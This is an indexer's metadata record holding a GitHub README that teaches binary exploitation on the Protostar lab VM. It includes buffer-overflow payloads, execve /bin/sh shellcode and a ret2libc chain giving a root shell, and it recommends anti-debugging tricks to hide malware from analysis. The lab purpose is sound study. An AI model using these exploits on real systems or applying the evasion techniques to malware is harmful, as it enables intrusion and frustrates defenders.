{"id":26469805,"url":"https://github.com/ocdbytes/binaryexploitation","last_synced_at":"2025-03-19T17:09:28.024Z","repository":{"id":113749410,"uuid":"519883423","full_name":"ocdbytes/BinaryExploitation","owner":"ocdbytes","description":"Basic binary exploitation | Working of Malwares/Binaries | Obfuscation to avoid antivirus | Parser Differential to avoid analysis of Binary/Malwares","archived":false,"fork":false,"pushed_at":"2022-09-21T17:54:52.000Z","size":6089,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":2,"default_branch":"main","last_synced_at":"2024-04-14T10:46:08.439Z","etag":null,"topics":["assembly","binary-exploitation","malware-analysis","reverse-engineering","x86-64"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ocdbytes.png","metadata":{"files":{"readme":"readme.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2022-07-31T20:45:09.000Z","updated_at":"2022-08-10T04:58:25.000Z","dependencies_parsed_at":"2023-03-15T11:30:54.289Z","dependency_job_id":null,"html_url":"https://github.com/ocdbytes/BinaryExploitation","commit_stats":null,"previous_names":["ocdbytes/binaryexploitation"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ocdbytes%2FBinaryExploitation","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ocdbytes%2FBinaryExploitation/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ocdbytes%2FBinaryExploitation/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ocdbytes%2FBinaryExploitation/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ocdbytes","download_url":"https://codeload.github.com/ocdbytes/BinaryExploitation/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":244470251,"owners_count":20457908,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["assembly","binary-exploitation","malware-analysis","reverse-engineering","x86-64"],"created_at":"2025-03-19T17:09:27.213Z","updated_at":"2025-03-19T17:09:28.016Z","avatar_url":"https://github.com/ocdbytes.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Binary Exploitation\n\n### Assembly Language (Basics)\n\nPractice on : https://microcorruption.com/debugger/New%20Orleans\n\nRead basic instructions in assembly like :\n\n- compare\n- jump\n- add\n- move\n- subtract\n- goto\n- push\n- pop\n\n.... etc.\n\nFocus on Memory and Stack instructions\n\n### Cracking a Binary\n\nGithub Link : https://github.com/LiveOverflow/liveoverflow_youtube/tree/master/0x05_simple_crackme_intro_assembler\n\nDownload the resources\n\n```bash\nwget https://raw.githubusercontent.com/LiveOverflow/liveoverflow_youtube/master/0x05_simple_crackme_intro_assembler/gdb_disassembly\nwget https://raw.githubusercontent.com/LiveOverflow/liveoverflow_youtube/master/0x05_simple_crackme_intro_assembler/license_1.c\n\n### After getting compile the binary\n\ngcc license_1.c -o license\n```\n\nIt's a simple program which checks if a license is valid or not by taking a input as an argument.\nTo see binary assembly code\n\n```bash\ngdb \"binary_name\"\n```\n\nAlways set the view as : set disassembly-flavor intel\nTo disassemble a function : disassemble \"func_name\"\n\nAnalyse the assembly Code -\u003e :)\n\n**GDB Commands :**\n\n- break (star)\"point_where_to_break\" : Eg, break \\*main\n- info registers : To get the info about the basic memory layout\n- si : to go through the code by instruction wise and stopping each time\n- ni : to go through the code by executing the function first and then stopping on the first instruction\n- run / run \"args\" : to start the program\n- set \"memory_pointer\" : Eg, set $eax=0, This will set the eax pointer to 0\n\n**Tools :**\n\n- radare2\n- Hopper Disassembler\n- strings\n- objdump\n- hexdump\n\n**Radare 2 Commands :**\n\n```bash\nr2 binary_name\n```\n\n- aaa : to analyse all the functions\n- afl : to analyse and list the functions\n- ? : to get the help menu for commands\n- pdf : to display the disassembled code of a function\n- s \"func/point\" : this will set the address to what we are giving as input to point. Eg, s sym.main\n- VV : To get graphical view / control graph\n\n### Let's try to make our code more safe\n\nStep 1 : let's not store the string as it is in the code\nStep 2 : Compare the sum of ascii's of the input with the sum of the real key\n\nNow our program is :\n\n```C\n#include \u003cstring.h\u003e\n#include \u003cstdio.h\u003e\n\nint main(int argc, char *argv[]) {\n if(argc==2) {\n printf(\"Checking License: %s\\n\", argv[1]);\n int sum = 0;\n for(int i = 0; i \u003c strlen(argv[1]);i++){\n sum += (int)argv[1][i];\n }\n if(sum == 916) {\n printf(\"Access Granted!\\n\");\n } else {\n printf(\"WRONG!\\n\");\n }\n } else {\n printf(\"Usage: \u003ckey\u003e\\n\");\n }\n return 0;\n}\n\n```\n\nUsing Radare 2 analyse the compiled binary and getting the way to bypass checks.\nNow making safe doesn't work so now we move to a new approach which is :\n\n**USING A PARSER DIFFERENTIAL**\n\nWhat is this and what it will do ?\n\n-\u003e Now as we know that we can run the binary in linux system and we can also pass it through gdb and radare2 to analyse but what if we can do something so that we will still be able to\nrun the binary but we aren't able to pass it through GDB and radare like softwares\n\nLet's write a python script for achieving our goal.\n**fuzzer.py** in 0x08 folder\n\nUses :\n\n- We can use this fuzzing technique to hide the working of our malware and stop people from analysing it.\n- To make the code uncrackable\n\nThe script above is not written in professional way but it gives us a glimpse of how the **Parser Differential** works.\n\nMore on this topic\n\n- https://www.sentinelone.com/blog/breaking-and-evading/\n- https://ioactive.com/striking-back-gdb-and-ida-debuggers/\n\n**SysCalls** : Bridge between Kernel Mode and User Mode\n\n## Now we need to practise our skills in binary exploitation\n\n### Protostar\n\nWe need to download the VM from : https://exploit.education/downloads/\n\n- Download Protostar\n- Install it in virtual box\n\n**Login Creds**\n\nusername : user\npassword : user\n\nMachine Page : https://exploit.education/protostar/\nAll the binaries which need to be exploited can be found in **/opt/protostar/bin**\n\n### Stack 0\n\nThis level introduces the concept that memory can be accessed outside of its allocated region, how the stack variables are laid out, and that modifying outside of the allocated memory can modify program execution.\n\n1. Here we will now boot up the machine with given creds. It will look something like this\n \u003cimg src=\"./images/BE1.png\"\u003e\u003c/img\u003e\n\n2. Navigate to /opt/protostar/bin\n\n3. The code of binary is given to us and now analyse it with gdb\n \u003cimg src=\"./images/BE2.png\"\u003e\u003c/img\u003e\n4. Let's understand the terminologies in the assembly code\n\n```txt\nPOINTERS\n--------\n\nebp = base pointer (it is at the bottom of the stack)\neip = instruction pointer\nesp = stack pointer\n\n\nINSTRUCTIONS\n------------\n\ncall = this will put the address on the top of the stack\nleave = this will pop all the local variable space in the stack\n```\n\n5. Now one thing we all know that never to use gets() function in c. It is dangerous.\n6. Set the breakpoint of the program at the get instruction in the following asm program\n\n```asm\n0x0000555555555149 \u003c+0\u003e: push rbp\n0x000055555555514a \u003c+1\u003e: mov rbp,rsp\n0x000055555555514d \u003c+4\u003e: sub rsp,0x60\n0x0000555555555151 \u003c+8\u003e: mov DWORD PTR [rbp-0x54],edi\n0x0000555555555154 \u003c+11\u003e: mov QWORD PTR [rbp-0x60],rsi\n0x0000555555555158 \u003c+15\u003e: mov DWORD PTR [rbp-0x4],0x0\n0x000055555555515f \u003c+22\u003e: lea rax,[rbp-0x50]\n0x0000555555555163 \u003c+26\u003e: mov rdi,rax\n0x0000555555555166 \u003c+29\u003e: mov eax,0x0\n0x000055555555516b \u003c+34\u003e: call 0x555555555040 \u003cgets@plt\u003e \u003c--- this is the gets instruction\n0x0000555555555170 \u003c+39\u003e: mov eax,DWORD PTR [rbp-0x4]\n0x0000555555555173 \u003c+42\u003e: test eax,eax \u003c--- here it is comparing the variables to 0\n0x0000555555555175 \u003c+44\u003e: je 0x555555555188 \u003cmain+63\u003e\n0x0000555555555177 \u003c+46\u003e: lea rax,[rip+0xe8a] # 0x555555556008\n0x000055555555517e \u003c+53\u003e: mov rdi,rax\n0x0000555555555181 \u003c+56\u003e: call 0x555555555030 \u003cputs@plt\u003e \u003c--- print statements\n0x0000555555555186 \u003c+61\u003e: jmp 0x555555555197 \u003cmain+78\u003e\n0x0000555555555188 \u003c+63\u003e: lea rax,[rip+0xea2] # 0x555555556031\n0x000055555555518f \u003c+70\u003e: mov rdi,rax\n0x0000555555555192 \u003c+73\u003e: call 0x555555555030 \u003cputs@plt\u003e \u003c--- print statements\n0x0000555555555197 \u003c+78\u003e: mov eax,0x0\n0x000055555555519c \u003c+83\u003e: leave\n0x000055555555519d \u003c+84\u003e: ret\n```\n\n**In GDB**\n\n```sh\nbreak *0x000055555555516b # on gets\nbreak *0x0000555555555170 # after gets\n```\n\n7. We will enter some commands for gdb to execute when we hit the break point we can do it by setting the hook-stop\n\n```sh\nType commands for definition of \"hook-stop\".\nEnd with a line saying just \"end\".\n\u003einfo registers\n\u003ex/24wx $esp\n\u003ex/2i $eip\n\u003eend\n```\n\nNow every time we hit a break point we will get the registers info and we will get the next two instructions which will be executed after the breakpoint\n\n8. Now restart the program using r and as soon we hit the breakpoint we get the registers with the values\n \u003cimg src=\"./images/BE3.png\"\u003e\u003c/img\u003e\n\n9. Now continue (c) the program and enter bunch of A's and now observe the register values and we see that there are bunch of 0x41414141.\n These values are nothing but the A's we provided --\u003e \"A\" = char(0x41)\n \u003cimg src=\"./images/BE4.png\"\u003e\u003c/img\u003e\n\n10. To check the content of the register which is being compared to zero we will use\n\n```sh\n(gdb) x/wx $esp+0x5c\n# OUTPUT -\u003e 0x000000000\n```\n\n11. Now we need to edit this but we need to count how many chars do we need to edit this. Let's count it from the output above and we will come to know that we need 64+ chars to edit our stack pointer $esp+0x5c\n\n12. generate sting using python\n\n```sh\npython3 -c 'print(\"A\"*70)'\n```\n\nNow copy and paste in gdb after restarting the execution\n\n\u003cimg src=\"./images/BE5.png\"\u003e\u003c/img\u003e\n\n13. And we have our result our pointer is edited to confirm check again using\n\n```sh\nx/wx $esp+0x5c\n#OUTPUT -\u003e 0x41414141\n```\n\n14. This kind of behavior is actually a vulnerability called **Buffer Overflow**\n\n#### Now we have solved our first stack vulnerabity\n\n### Stack 3\n\nStack3 looks at environment variables, and how they can be set, and overwriting function pointers stored on the stack (as a prelude to overwriting the saved EIP)\n\n1. Boot up the machine with given credentials.\n2. navigate to /opt/protostar/bin.\n3. Run the stack3 binary to check the behavior.\n4. Open the binary in gdb and analyse.\n5. Disassemble the Code and Analyse the main and win function.\n6. Now we need to know where our win() function lies in the memory so for that we will use :\n\n```txt\n(gdb) x win\n```\n\n7. This will give the address of the win() function.\n8. Now after analysing the assembly output of the main function we are able to find that the value fp; is called as a function if it is not equal to zero.\n9. Let's do some gdb stuff now\n\n```txt\n(gdb) break *(address_of_the_last_fp_call)\n(gdb) r\n---\u003e After running provide input\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n(gdb) info registers\n\n```\n\n10. Now we can see that our register eax is 0x41414141, this is nothing else but the A's we provided.\n11. Now we will write a simple script to know the offset till where our buffer is limited and where overflow is happening. (script in /stack3 directory) (script_name = \"check_offset.py\")\n12. Now we will pip the output of the offset script in gdb and get the offset.\n\n```sh\n# compile the script and store the output\npython /tmp/check_offset.py \u003e /tmp/out\n\n# Open the binary in gdb\n(gdb) disassemble main\n(gdb) break *(address_of_the_last_fp_call)\n(gdb) r \u003c /tmp/out\n(gdb) info registers\n```\n\n\u003cimg src=\"./images/BE6.png\"\u003e\u003c/img\u003e\n\n13. As we can see that our offset is at 0x51515151 exactly so this means that our buffer started to overflow when the letter Q appears so now create another script which will call our win function.\n (script in /stack3 directory) (script_name = \"exploit.py\")\n\n```sh\n(gdb) disassemble main\n(gdb) break *(address_of_the_last_fp_call)\n(gdb) r \u003c /tmp/out\n(gdb) info registers\n```\n\n\u003cimg src=\"./images/BE7.png\"\u003e\u003c/img\u003e\n\n14. Now after piping the output to the binary in gdb we can see that our eax pointer is set to 0x08048424, therefore our next execution call will be win() function.\n\n```sh\n(gdb) c\n```\n\n\u003cimg src=\"./images/BE8.png\"\u003e\u003c/img\u003e\n\n15. And we see our output as 'code flow successfully changed' we can confirm it using\n\n```sh\npython /tmp/exploit.py | ./stack3\n```\n\nVOILA, stack 3 binary is exploited.\nSimilarly stack4 can also be solved :)\n\n### Stack 4\n\nSolved !! scripts in directory stack4\n\n### Stack 5\n\nStack5 is a standard buffer overflow, this time introducing shellcode.\n\nAnalyse the binary in GDB\n\n- Let's make a break point at \"return\" of the main function\n- Now we need to analyse the registers so we will make a hook-stop\n\n```txt\n\u003e x/1i $eip\n\u003e x/8wx $esp\n\u003e end\n```\n\n**x/1i $eip** : To read the first instruction at the instruction pointer.\n**x/8wx $esp** : Examine 8 words in hex from the stack.\n**end** : to end the hook\n\n\u003cimg src=\"./images/BE9.png\"\u003e\u003c/img\u003e\n\u003cimg src=\"./images/BE10.png\"\u003e\u003c/img\u003e\n\nLet's provide the input as the offset string generated by the offset.py program\n\n```sh\n(gdb) r \u003c /tmp/offset\n```\n\n\u003cimg src=\"./images/BE11.png\"\u003e\u003c/img\u003e\n\nNow after continuing check the info registers to get the esp value so that we can append it to the exploit string\n\n\u003cimg src=\"./images/BE12.png\"\u003e\u003c/img\u003e\n\nLet's create the exploit\n\n```python\nstring = \"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSS\"\neip = \"\\x20\\xf8\\xff\\xbf\" # 0xbffff820 = $esp (after return)\n# This is INT 3 instruction to stop the execution and then execute somehing else\npayload = \"\\xCC\" * 4\n\nprint(string+eip+payload)\n```\n\n\u003cimg src=\"./images/BE13.png\"\u003e\u003c/img\u003e\n\nViola 🎉 !! We got **SIGTRAP** Error which is a trace/breakpoint trap\n\nNow if we run the code we will get **ILLEGAL INSTRUCTION**\n\n**Why is this happening ?**\n\nThe main reason for this is different execution environments for our input and the gdb instruction. We can understand more from this.\n\n\u003cimg src=\"./images/BE14.png\"\u003e\u003c/img\u003e\n\nWe can notice differnet addresses in the Environment Variables 🧮\n\nHow to overcome this ?\n\n- Disable ENV variables before running the program\n- Use number of NOP (No Operation instruction)\n\nWe will use the second technique to overcome this addressing problem. Modify the exploit 🧰\n\n```python\nstring = \"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSS\"\neip = \"\\x20\\xf8\\xff\\xbf\" # 0xbffff820 = $esp (after return)\n# This is INT 3 instruction to stop the execution and then execute somehing else\npayload = \"\\x90\" * 100 + \"\\xCC\" * 4 # \\x90 : NOP instruction\n\nprint(string+eip+payload)\n```\n\nNow if we run the code we will get **Trace/Breakpoint Trap** 🎉\n\nNow we will access shell using the shell code from : http://www.shell-storm.org/shellcode/files/shellcode-811.php\n\n```txt\n\"\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\"\n\"\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\"\n\"\\xe3\\x89\\xc1\\x89\\xc2\\xb0\\x0b\"\n\"\\xcd\\x80\\x31\\xc0\\x40\\xcd\\x80\";\n```\n\nLet's design the exploit :\n\n```python\nstring = \"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSS\"\neip = \"\\x20\\xf8\\xff\\xbf\" # 0xbffff820 = $esp (after return)\nnops = \"\\x90\" * 100 # \\x90 : NOP instruction\n\n# SHELLCODE\n# ---------\n# This is the shellcode to execute /bin/bash\n\npayload = \"\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x89\\xc1\\x89\\xc2\\xb0\\x0b\\xcd\\x80\\x31\\xc0\\x40\\xcd\\x80\";\n\nprint(string+eip+nops+payload)\n```\n\nNow we will execute the binary with our exploit output and cat to get an interactive shell\n\n```txt\n(python3 fin_exp.py ; cat) \u003e ./stack5\n```\n\n### Stack 6\n\nStack6 looks at what happens when you have restrictions on the return address.\nThis level can be done in a couple of ways, such as finding the duplicate of the payload ( objdump -s will help with this), or ret2libc , or even return orientated programming.\nIt is strongly suggested you experiment with multiple ways of getting your code to execute here.\n\n```c\n#include \u003cstdlib.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003cstring.h\u003e\n\nvoid getpath()\n{\n char buffer[64]; // buffer of 64 bytes\n unsigned int ret;\n\n printf(\"input path please: \"); fflush(stdout);\n\n gets(buffer);\n\n ret = __builtin_return_address(0); // __builtin_return_address -\u003e this function returns the return address of the function (current one / caller one)\n\n if((ret \u0026 0xbf000000) == 0xbf000000) { // This function is checking if the address starts with 0xbf it will exit the code and print the result given below (bzzzt)\n printf(\"bzzzt (%p)\\n\", ret);\n _exit(1);\n }\n\n printf(\"got path %s\\n\", buffer); // We need our code to be exited here and hit the Trace/Breakpoint Trap\n}\n\nint main(int argc, char **argv)\n{\n getpath(); // Calling getpath()\n}\n```\n\nNow the exploit we developed previously willnot work this time because of the if statement checking the condition of the memory return Address we can try doing it and we will get the result as \"bzzzt 0xbf\\***\\*\\_\\_\\*\\***(any address)\"\n\n\u003cimg src=\"./images/BE15.png\"\u003e\u003c/img\u003e\n\nNow we need to bypass this 0xbf thing and execute our code from the buffer\n\n```txt\n(gdb) set disassembly-flavor intel\n(gdb) disassemble main\n(gdb) break *getpath ----\u003e To set a breakpoint at the address where getpath is called in the main function.\n(gdb) r\n(gdb) info proc map\n```\n\n\u003cimg src=\"./images/BE16.png\"\u003e\u003c/img\u003e\n\nAs we can see here that the only addresses which are on the stack are starting with \"0xbf--------\". This is the problem for us.\nNow what we will do is we will replce our return address with the return address of getpath() function.\n\nThis is what will happen then :\n\n- First the function will call the return which we provided in the stack\n- This will bypass the if statement check of 0xbf\n- Now the function will return itself\n- Now the next address on the stack will be 0xbf------- (which is what we need to jump back in the stack in order to execute our shellcode)\n\nLet's design an exploit for that :\n\n```py\nimport struct\nstring = \"0000AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSS\"\neip = struct.pack(\"I\", 0xbffff7c0+32)\nreturn_addr = struct.pack(\"I\", 0x080484f9)\ntrap = \"\\xCC\" * 100\n\nprint(string+return_addr+eip+trap)\n\n```\n\nIn GDB :\n\n```sh\n(gdb) disassemble getpath\n(gdb) break *0x080484f9\n(gdb) r \u003c /tmp/stack6\n(gdb) x/4wx $esp\n(gdb) si\n(gdb) x/4wx $esp\n(gdb) si\n(gdb) c\n```\n\nVIOLA 🎉 !! We have ou exploit done\nWe recieved our TRAP/BREAKPOINT. Now we can execute our shellcode or binary code to get our desired access\n\n### Stack 7\n\nThis stack is similar to the previous stack in which we need to use the rit2libc technique to solve this challenge.\nNow first analyse the breakpoints and the eip and esp pointers after setting the breakpoint at the getpath() function.\n\n**Get Path Function**\n\n```asm\n0x0000000100003e30 \u003c+0\u003e: push rbp\n0x0000000100003e31 \u003c+1\u003e: mov rbp,rsp\n0x0000000100003e34 \u003c+4\u003e: sub rsp,0x60\n0x0000000100003e38 \u003c+8\u003e: mov rax,QWORD PTR [rip+0x1c1] # 0x100004000\n0x0000000100003e3f \u003c+15\u003e: mov rax,QWORD PTR [rax]\n0x0000000100003e42 \u003c+18\u003e: mov QWORD PTR [rbp-0x8],rax\n0x0000000100003e46 \u003c+22\u003e: lea rdi,[rip+0x12f] # 0x100003f7c\n0x0000000100003e4d \u003c+29\u003e: mov al,0x0\n0x0000000100003e4f \u003c+31\u003e: call 0x100003f24\n0x0000000100003e54 \u003c+36\u003e: mov rax,QWORD PTR [rip+0x1ad] # 0x100004008\n0x0000000100003e5b \u003c+43\u003e: mov rdi,QWORD PTR [rax]\n0x0000000100003e5e \u003c+46\u003e: call 0x100003f18\n0x0000000100003e63 \u003c+51\u003e: lea rdi,[rbp-0x50]\n0x0000000100003e67 \u003c+55\u003e: call 0x100003f1e\n0x0000000100003e6c \u003c+60\u003e: mov rax,QWORD PTR [rbp+0x8]\n0x0000000100003e70 \u003c+64\u003e: mov DWORD PTR [rbp-0x54],eax\n0x0000000100003e73 \u003c+67\u003e: mov eax,DWORD PTR [rbp-0x54]\n0x0000000100003e76 \u003c+70\u003e: and eax,0xb0000000\n0x0000000100003e80 \u003c+80\u003e: jne 0x100003ea1 \u003cgetpath+113\u003e\n0x0000000100003e86 \u003c+86\u003e: mov esi,DWORD PTR [rbp-0x54]\n0x0000000100003e89 \u003c+89\u003e: lea rdi,[rip+0x100] # 0x100003f90\n0x0000000100003e90 \u003c+96\u003e: xor eax,eax\n0x0000000100003e92 \u003c+98\u003e: call 0x100003f24\n0x0000000100003e97 \u003c+103\u003e: mov edi,0x1\n0x0000000100003e9c \u003c+108\u003e: call 0x100003f12\n0x0000000100003ea1 \u003c+113\u003e: lea rsi,[rbp-0x50]\n0x0000000100003ea5 \u003c+117\u003e: lea rdi,[rip+0xf0] # 0x100003f9c\n0x0000000100003eac \u003c+124\u003e: mov al,0x0\n0x0000000100003eae \u003c+126\u003e: call 0x100003f24\n0x0000000100003eb3 \u003c+131\u003e: lea rdi,[rbp-0x50]\n0x0000000100003eb7 \u003c+135\u003e: call 0x100003f2a\n0x0000000100003ebc \u003c+140\u003e: mov QWORD PTR [rbp-0x60],rax\n0x0000000100003ec0 \u003c+144\u003e: mov rax,QWORD PTR [rip+0x139] # 0x100004000\n0x0000000100003ec7 \u003c+151\u003e: mov rax,QWORD PTR [rax]\n0x0000000100003eca \u003c+154\u003e: mov rcx,QWORD PTR [rbp-0x8]\n0x0000000100003ece \u003c+158\u003e: cmp rax,rcx\n0x0000000100003ed1 \u003c+161\u003e: jne 0x100003ee1 \u003cgetpath+177\u003e\n0x0000000100003ed7 \u003c+167\u003e: mov rax,QWORD PTR [rbp-0x60]\n0x0000000100003edb \u003c+171\u003e: add rsp,0x60\n0x0000000100003edf \u003c+175\u003e: pop rbp\n0x0000000100003ee0 \u003c+176\u003e: ret\n0x0000000100003ee1 \u003c+177\u003e: call 0x100003f0c\n0x0000000100003ee6 \u003c+182\u003e: ud2\n0x0000000100003ee8 \u003c+184\u003e: nop DWORD PTR [rax+rax*1+0x0]\n```\n\n```sh\n(gdb) set disassembly-flavor intel\n(gdb) disassemble getpath\n(gdb) break getpath\n(gdb) r\n(gdb) x/i $eip # eip pointer -\u003e Next instruction to be executed\n(gdb) x/80x $esp # This will give us the top 80 address/instructions from the stack\n(gdb) c\n```\n\nNow we will run this by setting the hook-stop with offset as an input\n\nSetting the hook-stop\n\n```sh\n(gdb) set hook-stop\n\u003e info registers\n\u003e x/3i $eip\n\u003e x/80x $esp\n\u003e end\n```\n\nSetting the breakpoint after the gets() function address and running the program and continuing the execution\n\n```sh\n(gdb) break *0x080484ef\n(gdb) r \u003c /tmp/offset\n(gdb) c\n```\n\n\u003cimg src=\"./images/BE17.png\"\u003e\u003c/img\u003e\n\nNow we got segmentation fault at address 0x55555555 =\u003e char(0x55) =\u003e 'U'\nWe have our offset now which is from 'A' to 'T' all 4 chars. This string will look like :\nAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTT\n\nLet's develop a python script for this :\n\n- We need to first get the \"/bin/sh\" address in the system\n- Then we need to point the $eip to execute the \"/bin/sh\" as root\n\nGetting system address in gdb\n\n```sh\n(gdb) p system\n$1 = {\u003ctext variable, no debug info\u003e} 0xb7ecffb0 \u003c__libc_system\u003e\n\n# System Address : 0xb7ecffb0\n```\n\nLet's get the libc address in gdb\n\n```sh\n(gdb) info proc map\n```\n\n\u003cimg src=\"./images/BE18.png\"\u003e\u003c/img\u003e\n\nNow we know our libc address let's get the \"/bin/sh\" address in gdb\n\n```sh\n(gdb) find \u0026system, +9999999, \"/bin/sh\"\n```\n\nWe got the address as : 0xb7fba23f for \"/bin/sh\" in gdb. Let's cross check if it is the \"/bin/sh\" or not ?\n\n```sh\n(gdb) x/s 0xb7fba23f\n\n# OUTPUT :\n0xb7fba23f: \"KIND in __gen_tempname\\\"\"\n```\n\nThis is a wrong address we need to find the real address of \"/bin/sh\" in gdb. Let's use strings module to find the real address (I got this method from a blog)\n\n```sh\nuser@protostar:/opt/protostar/bin$ strings -a -t x /lib/libc-2.11.2.so | grep /bin/sh\n\n# OUTPUT :\n11f3bf /bin/sh\n```\n\nNow to get the /bin/sh address we will add 11f3bf to libc address which would be :\n\n```txt\n0xb7e97000 + 11f3bf = 0xb7fb63bf\n```\n\nLet's check if this is the real address of /bin/sh\n\n```sh\n(gdb) x/s 0xb7fb63bf\n```\n\nVoila !! 🎉 we got the real address\n\nExploit :\n\n```py\nbuffer = \"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTT\" # padding\nsystem_address = \"\\xb0\\xff\\xec\\xb7\" # system : 0xb7ecffb0\ndrag = \"AAAA\"\nbin_sh = \"\\xbf\\x63\\xfb\\xb7\" # /bin/sh : 0xb7fb63bf\n\nexploit_string = buffer + system_address+drag + bin_sh\nprint(exploit_string)\n```\n\n```sh\nuser@protostar:/opt/protostar/bin$ python /tmp/exploit.py \u003e /tmp/exploit\n```\n\nLet's run the exploit with this string\n\n```sh\nuser@protostar:/opt/protostar/bin$ python /tmp/exploit.py | ./stack7\n\n# OUTPUT\n\ninput path please : bzzzt (0xb7ecffb0)\n```\n\nNow we need to bypass the filter so for that we will first go to the return address of the getpath() function. Address of the \"ret\" instruction in getpath() : 0x08048544\n\nNow our new exploit will become :\n\n```py\nbuffer = \"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTT\" # padding\nret = \"\\x44\\x85\\x04\\x08\" # return address of getpath()\nsystem_address = \"\\xb0\\xff\\xec\\xb7\" # system : 0xb7ecffb0\ndrag = \"AAAA\"\nbin_sh = \"\\xbf\\x63\\xfb\\xb7\" # /bin/sh : 0xb7fb63bf\n\nexploit_string = buffer + ret + system_address + drag + bin_sh\nprint(exploit_string)\n```\n\nWooohoooo !! We have what we wanted a SEGMENTATION FAULT after the binary execution\n\n\u003cimg src=\"./images/BE19.png\"\u003e\u003c/img\u003e\n\nGaining the root shell\n\n```sh\n(python /tmp/exploit.py ;cat) | ./stack7\n```\n\nWe got the f\\*\\*king shell with root access\n\n\u003cimg src=\"./images/BE20.png\"\u003e\u003c/img\u003e\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Focdbytes%2Fbinaryexploitation","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Focdbytes%2Fbinaryexploitation","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Focdbytes%2Fbinaryexploitation/lists"}